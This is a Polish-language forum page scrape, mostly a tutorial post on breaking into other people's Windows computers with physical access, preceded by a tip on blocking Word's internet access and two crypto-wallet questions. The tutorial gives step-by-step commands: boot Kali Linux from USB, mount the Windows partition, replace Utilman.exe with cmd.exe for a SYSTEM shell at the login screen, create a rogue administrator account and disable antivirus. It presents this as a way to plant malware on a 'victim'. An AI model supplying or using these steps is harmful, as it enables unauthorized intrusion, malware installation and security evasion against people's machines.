W tym momencie Word nie ma fizycznej możliwości przesyłania jakichkolwiek danych (na przykład waszych recenzji środków z wiekiem/wagą/wzrostem) do siedziby Microsoftu.

Delikwentowi można oczywiście zablokować dostęp do internetu na przeróżne inne sposoby, aczkolwiek ten wydaje mi się najprostszym.

Rzecz jasna, to tylko mały krok w drodze do anonimowości, bo największy szpieg to dziurawy jak gacie Janusza Windows, a drugi uruchamia się wraz z założeniem konta na tfu Gmail, ale lepszy wróbel w garści niż siusiacz w dupie.

Powyższy tutorial można zastosować do każdego programu, który do pracy nie wymaga połączenia z internetem: np. Photoshop, Gimp, Notepad i tak dalej.

Portfel

Thu, 20 Mar 2025 09:12:00 +0000

Siema wszystkim mam pytanie a propo portfeli np btc robicie np co roku nowy czy macie ciągle ten sam i czy wogle jest sens zmieniania portfela co jakiś czas bo słyszałem że są osoby które tak robią ale czy w praktyce coś to daje to nie wiem

Automaty Bitcoin czy potrzebna weryfikacja ?

Sun, 16 Feb 2025 20:09:59 +0000

Siema czy w bitomatach btc potrzebna jest weryfikacja?

[tut] wpierdalanie sie na komputery z windowsem

Tue, 14 Jan 2025 09:18:30 +0000

[tut] wpierdalanie sie na komputery z windowsem

- patent dziala na komputerach z systemami windows do wydania 11 windy

Duzymi zaletami patentu sa

-Zaplantowanie malware'u bezpośrednio u ofiary z pominięciem całego procesu wysyłki, socjotechniki i utrudnień innych wielu,
-Możliwość ataku wykonania w pełni offline,
-Gdy pierdolniesz się w łeb i hasła do swojego komputera zapomnisz,

Uwaga wymaga to fizycznego kontaktu z komputerem / laptopem ofiary, wszystko czego potrzebujemy to pendrive min 8GB. Ale imo 16 GB nada sie jeszcze lepiej, patent jednym z najprostszych sposobow na dostanie sie na komputer jest.

zaczynamy od pobrania wersji live kali'linuxa

Cytat:https://www.kali.org/get-kali/#kali-live

oraz stworzenia flashowanego pendriva za pomoca np Rufusa albo Baleny Ether , jesli nie umeisz tego zrobic jest masa poradnikow w internecie. ( https://www.kali.org/docs/usb/live-usb-i...h-windows/ )

Cytat:https://rufus.ie/pl/

Teraz tak, jesli masz juz dzialajcego pena wkladasz go w kompa ofiary i bootujesz system. Jednak wchodzisz do Biosu badz UEFI albo Boot Menu (skrot klawiszowy od producenta plyty glownej zalezny.)
Najczesciej mozesz spotkac sie z klawiszami F1 - F12 / oraz DEL jesli nie wiesz ktory to po prostu zapierdol po klawiaturze jak po harmonijce, kiedy odpali sie kali

Uruchamiasz Terminal.

Tworzysz Folder

Cytat:mkdir /mnt/C

Partycje listujesz

Cytat:-fdisk -l
LUB
fdisk -l

Wybierasz tę na której system siedzi i montujesz zakladajac ze Winda jest hipotetycznie na /dev/nvme0n1p2

Cytat:mount /dev/nvme0n1p2 /mnt/C

U WAS NAJPEWNIEJ PARTYCJA BEDZIE SIE NAZYWAC /dev/sda(numerek)

Urządzenie Początek Koniec Sektory Rozmiar Typ

/dev/nvme0n1p1 2048 1001471 999424 488M Systemowa EFI

/dev/nvme0n1p2 1001472 9390079 8388608 4G Linux - wymiany

/dev/nvme0n1p3 9390080 500117503 490727424 234G Linux - system plików

ale wczesniej spojrz to jest wynik mojego wylistowania laptopa tylko z linuxem i jedna partycja! po wylistowaniu partycji na ktorych jest Windows widziec bedziesz po tym co na koncowej linijce pisze

Przechodzisz do folderu System32

Cytat:cd /mnt/C/Windows/System32

Grepujesz plik Utilman.exe

Grep / grepowanie / greeping (podmiana programu / pliku rozruchowego / skryptu na inny program najprosciej powiedziec ze mozemy zamienic plik .exe na inny plik .exe)

W Windowsie na oknie logowania na użytkownika konto masz narzędzie 'ease of access' albo ułatwienia dostępu. Tak składa się, że plik Utilman.exe który za ten proces odpowiada jest wykonywany na najwyższych uprawnieniach,więc jedyne co zrobić musisz to podmienić ten plik na cmd.exe i wówczas konsola zostanie uruchomiona na systemowych uprawnieniach.

Backup oryginalnego Utilmana zrób oczywiście

Cytat:mv Utilman.exe Utilman_backup.exe

mv cmd.exe Utilman.exe

I tyle, bootujesz od nowa Windę i czekasz na okno logowania.

Klikając w ikonkę ułatwienia dostępu powinna pojawić się konsola na użytkowniku SYSTEM czyli można hasać.

Dodajesz sobie usera i wrzucasz go do adminów

Cytat:net user Diobelek /add

net localgroup administrators Diobelek /add

Uwaga: w nowszych systemach (10,11) lepiej wyłączyć AV bo wychwyci i zablokuje proces ten.

Robisz to w następujący sposób:

Cytat:>Shift trzymając klikasz opcję Restart aby wejść w zaawansowane opcje
>Troubleshoot
>Opcje zaawansowane
>Ustawienia startowe
>Restart
>F8 (wyłączenie AV)

sposob bardzo stary ale dalej jary. nwm mozna to wykorzystac na miliony sposobow jeden najprostszy przyklad to jak chodzilem do szkoly i mieszkalem z rodzicami omijalem wszystkie kary na kompa...